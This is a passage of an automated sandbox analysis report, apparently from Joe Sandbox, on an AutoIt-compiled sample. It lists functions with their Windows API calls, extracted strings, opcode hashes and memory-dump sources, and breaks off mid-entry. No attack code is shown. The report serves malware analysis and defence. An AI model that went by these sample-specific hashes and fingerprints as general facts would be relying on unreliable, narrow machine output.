                                                                            • Opcode ID: 29ea7053f1321c4c3850cd479c6f846b137076d78b4eb396f3d518e57777407b
                                                                            • Instruction ID: d68037f6d30d89c83467db2fd42488d92637b21dfe2f33aacf9d2aa86be2a463
                                                                            • Opcode Fuzzy Hash: 29ea7053f1321c4c3850cd479c6f846b137076d78b4eb396f3d518e57777407b
                                                                            • Instruction Fuzzy Hash: D6A0223002020CFBCF032F82FC08888BFACEB003A0F0080A2F80C00032CB33A8208AC0
                                                                            Function 002F3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,00300980), ref: 002F3C65
                                                                            • IsWindowVisible.USER32(?), ref: 002F3C89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            • Opcode ID: a00bf187262f09c5ba352bb9a1fb86a3fdd59d7a6ad557265c6fe74d8daf01b9
                                                                            • Instruction ID: 02f91e022f38bb10da74886d6e1bc73e4dd51a1ce05ea8b034f587bcda806630
                                                                            • Opcode Fuzzy Hash: a00bf187262f09c5ba352bb9a1fb86a3fdd59d7a6ad557265c6fe74d8daf01b9
                                                                            • Instruction Fuzzy Hash: CFD15F34234219CBCB19EF10C451A7EB7A5EF94384F104568FA855B2A2CB71EE6ACF91
                                                                            Function 002FABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 002FAC55
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 002FAC86
                                                                            • GetSysColor.USER32(0000000F), ref: 002FAC92
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 002FACAC
                                                                            • SelectObject.GDI32(?,?), ref: 002FACBB
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002FACE6
                                                                            • GetSysColor.USER32(00000010), ref: 002FACEE
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 002FACF5
                                                                            • FrameRect.USER32(?,?,00000000), ref: 002FAD04
                                                                            • DeleteObject.GDI32(00000000), ref: 002FAD0B
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 002FAD56
                                                                            • FillRect.USER32(?,?,?), ref: 002FAD88
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002FADB3
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(00000012), ref: 002FAF51
                                                                              • Part of subcall function 002FAF18: SetTextColor.GDI32(?,?), ref: 002FAF55
                                                                              • Part of subcall function 002FAF18: GetSysColorBrush.USER32(0000000F), ref: 002FAF6B
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(0000000F), ref: 002FAF76
                                                                              • Part of subcall function 002FAF18: GetSysColor.USER32(00000011), ref: 002FAF93
                                                                              • Part of subcall function 002FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002FAFA1
                                                                              • Part of subcall function 002FAF18: SelectObject.GDI32(?,00000000), ref: 002FAFB2
                                                                              • Part of subcall function 002FAF18: SetBkColor.GDI32(?,00000000), ref: 002FAFBB
                                                                              • Part of subcall function 002FAF18: SelectObject.GDI32(?,?), ref: 002FAFC8
                                                                              • Part of subcall function 002FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 002FAFE7
                                                                              • Part of subcall function 002FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002FAFFE
                                                                              • Part of subcall function 002FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 002FB013
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: e9d7f83a9dd13c462153b41b503dcd0421472a3fca6c7712fffd97efae175ee2
                                                                            • Instruction ID: 932e44afc586c56efe6b64cab8331d34b988f8eed8b0fa08953b8c6a368b0a8f
                                                                            • Opcode Fuzzy Hash: e9d7f83a9dd13c462153b41b503dcd0421472a3fca6c7712fffd97efae175ee2
                                                                            • Instruction Fuzzy Hash: E5A1D0B1019305AFD7169F64DC08F6BBBA9FF89321F100A2AF666961E0C770D850CF52
                                                                            Function 00272FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?), ref: 00273072
                                                                            • DeleteObject.GDI32(00000000), ref: 002730B8
                                                                            • DeleteObject.GDI32(00000000), ref: 002730C3
                                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 002730CE
                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 002730D9
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 002AC77C
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002AC7B5
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002ACBDE
                                                                              • Part of subcall function 00271F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00272412,?,00000000,?,?,?,?,00271AA7,00000000,?), ref: 00271F76
                                                                            • SendMessageW.USER32(?,00001053), ref: 002ACC1B
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002ACC32
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ACC48
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 002ACC53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 464785882-4108050209
                                                                            • Opcode ID: d8000a5d25fd67c7bef591ca34b6a73f49cdf28082779078476f78a2792cd167
                                                                            • Instruction ID: 16c64d19e147bd743dca513aca194da4926c33cebf5232134e4eaaf9bec08faa
                                                                            • Opcode Fuzzy Hash: d8000a5d25fd67c7bef591ca34b6a73f49cdf28082779078476f78a2792cd167
                                                                            • Instruction Fuzzy Hash: C9129F30624202EFDB25CF24C894BA5B7A5FF06310F24856AE599CB262CB31ED65DF91
                                                                            Function 002827FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 2660009612-1645009161
                                                                            • Opcode ID: 698fed91e4c44182dba59d773f43ea9d4b2ab8fbaaf5f7f5484b42784f1fa3cd
                                                                            • Instruction ID: fd9c2071197f4206a4697bb545860827da0578284561b2e33d894860e9a91ba2
                                                                            • Opcode Fuzzy Hash: 698fed91e4c44182dba59d773f43ea9d4b2ab8fbaaf5f7f5484b42784f1fa3cd
                                                                            • Instruction Fuzzy Hash: D4A1A234A2120AEBDF15FF21DD52EAE7BA8AF04740F144029FC05A62D2DB719E75DB60
                                                                            Function 002E7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 002E7BC8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002E7C87
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002E7CC5
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002E7CD7
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002E7D1D
                                                                            • GetClientRect.USER32(00000000,?), ref: 002E7D29
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002E7D6D
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002E7D7C
                                                                            • GetStockObject.GDI32(00000011), ref: 002E7D8C
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002E7D90
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002E7DA0
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E7DA9
                                                                            • DeleteDC.GDI32(00000000), ref: 002E7DB2
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002E7DDE
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 002E7DF5
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002E7E30
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002E7E44
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 002E7E55
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002E7E85
                                                                            • GetStockObject.GDI32(00000011), ref: 002E7E90
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002E7E9B
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002E7EA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 8208048c8435444d5625b616d7c668fc0fe49d41da34143f71660bdfc1241dba
                                                                            • Instruction ID: 92353120d4652d65d725f9918c0adc55504cc4f74754967e385284c44050259a
                                                                            • Opcode Fuzzy Hash: 8208048c8435444d5625b616d7c668fc0fe49d41da34143f71660bdfc1241dba
                                                                            • Instruction Fuzzy Hash: 85A160B1A51219BFEB15DB64DC8AFAB7BADEB09710F008115FA15E72E0C770AD10CB60
                                                                            Function 002DB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DB361
                                                                            • GetDriveTypeW.KERNEL32(?,00302C4C,?,\\.\,00300980), ref: 002DB43E
                                                                            • SetErrorMode.KERNEL32(00000000,00302C4C,?,\\.\,00300980), ref: 002DB59C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 57bcfabb575ab33200bfea398202a607fd5528976154bdb6421fa96eaf5ffc78
                                                                            • Instruction ID: f923b31673c86fb3b1c2772008a4aa5ad1af63dcc19e72d79517c048ff03f9c0
                                                                            • Opcode Fuzzy Hash: 57bcfabb575ab33200bfea398202a607fd5528976154bdb6421fa96eaf5ffc78
                                                                            • Instruction Fuzzy Hash: F151F830B70209EBCB12EF24E962ABCB7A0AF44740B65411BF406A77D1D7B1AE71DB51
                                                                            Function 002FA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002FA0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002FA1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 002FA1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: 5f91e829c8c84e58b016fc5a82a48e5e3041c6ced40b8830a0a1ced7785b4271
                                                                            • Instruction ID: 5b8179f05dff53530b49c9b2ea882e5066282928c8b1226138447bad36c5c2af
                                                                            • Opcode Fuzzy Hash: 5f91e829c8c84e58b016fc5a82a48e5e3041c6ced40b8830a0a1ced7785b4271
                                                                            • Instruction Fuzzy Hash: 8102E2B012820AAFD715CF18C858BBAFBE5FF45384F04852DFA99962A0C775D864CF52
                                                                            Function 002FAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 002FAF51
                                                                            • SetTextColor.GDI32(?,?), ref: 002FAF55
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 002FAF6B
                                                                            • GetSysColor.USER32(0000000F), ref: 002FAF76
                                                                            • CreateSolidBrush.GDI32(?), ref: 002FAF7B
                                                                            • GetSysColor.USER32(00000011), ref: 002FAF93
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002FAFA1
                                                                            • SelectObject.GDI32(?,00000000), ref: 002FAFB2
                                                                            • SetBkColor.GDI32(?,00000000), ref: 002FAFBB
                                                                            • SelectObject.GDI32(?,?), ref: 002FAFC8
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 002FAFE7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002FAFFE
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 002FB013
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002FB05F
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002FB086
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 002FB0A4
                                                                            • DrawFocusRect.USER32(?,?), ref: 002FB0AF
                                                                            • GetSysColor.USER32(00000011), ref: 002FB0BD
                                                                            • SetTextColor.GDI32(?,00000000), ref: 002FB0C5
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002FB0D9
                                                                            • SelectObject.GDI32(?,002FAC1F), ref: 002FB0F0
                                                                            • DeleteObject.GDI32(?), ref: 002FB0FB
                                                                            • SelectObject.GDI32(?,?), ref: 002FB101
                                                                            • DeleteObject.GDI32(?), ref: 002FB106
                                                                            • SetTextColor.GDI32(?,?), ref: 002FB10C
                                                                            • SetBkColor.GDI32(?,?), ref: 002FB116
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: b3e2f8f1484a145baf10e2c34d0317613d945a115e7262dde596c05141d9b83d
                                                                            • Instruction ID: 3ad68f0b4ab8fddf38d3b5463be7e492eab4452f0e555749f147ddf1b00075e4
                                                                            • Opcode Fuzzy Hash: b3e2f8f1484a145baf10e2c34d0317613d945a115e7262dde596c05141d9b83d
                                                                            • Instruction Fuzzy Hash: 26617071911219AFDF169FA4DC48FAEBB79FF08320F104226FA15AB2A1D7719950CF90
                                                                            Function 002F8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002F90EA
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F90FB
                                                                            • CharNextW.USER32(0000014E), ref: 002F912A
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002F916B
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002F9181
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F9192
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002F91AF
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 002F91FB
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002F9211
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F9242
                                                                            • _memset.LIBCMT ref: 002F9267
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002F92B0
                                                                            • _memset.LIBCMT ref: 002F930F
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002F9339
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 002F9391
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 002F943E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002F9460
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F94AA
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F94D7
                                                                            • DrawMenuBar.USER32(?), ref: 002F94E6
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 002F950E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: 4a4c7df826174760696ced523058216abd0ec1ac03fc2feb71b3fcd781d4d865
                                                                            • Instruction ID: f909ccdc3298df7353a2445bc21fbb15424cae2962c944707e783667c7caa8d8
                                                                            • Opcode Fuzzy Hash: 4a4c7df826174760696ced523058216abd0ec1ac03fc2feb71b3fcd781d4d865
                                                                            • Instruction Fuzzy Hash: 08E18F7091020DABDF219F54CC84FFEBBB9EF05790F40816AFA15AA191DB718AA1CF50
                                                                            Function 002F4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 002F5007
                                                                            • GetDesktopWindow.USER32 ref: 002F501C
                                                                            • GetWindowRect.USER32(00000000), ref: 002F5023
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F5085
                                                                            • DestroyWindow.USER32(?), ref: 002F50B1
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002F50DA
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F50F8
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002F511E
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 002F5133
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002F5146
                                                                            • IsWindowVisible.USER32(?), ref: 002F5166
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002F5181
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002F5195
                                                                            • GetWindowRect.USER32(?,?), ref: 002F51AD
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 002F51D3
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 002F51ED
                                                                            • CopyRect.USER32(?,?), ref: 002F5204
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 002F526F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: d4db152e1dbfe54e3cbae16639080eff9356c7b2d567521c72f98af655be280d
                                                                            • Instruction ID: fdbe93debe676239ec77191d270b1153b55c1ed746eeb8cb70dbe63f0dacd6eb
                                                                            • Opcode Fuzzy Hash: d4db152e1dbfe54e3cbae16639080eff9356c7b2d567521c72f98af655be280d
                                                                            • Instruction Fuzzy Hash: A2B18870224715AFD704DF64C844B6BFBE5EF88350F008A2DFA999B291DB71E815CB92
                                                                            Function 002D498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002D499C
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002D49C2
                                                                            • _wcscpy.LIBCMT ref: 002D49F0
                                                                            • _wcscmp.LIBCMT ref: 002D49FB
                                                                            • _wcscat.LIBCMT ref: 002D4A11
                                                                            • _wcsstr.LIBCMT ref: 002D4A1C
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002D4A38
                                                                            • _wcscat.LIBCMT ref: 002D4A81
                                                                            • _wcscat.LIBCMT ref: 002D4A88
                                                                            • _wcsncpy.LIBCMT ref: 002D4AB3
                                                                            Strings
                                                                            Memory Dump Source
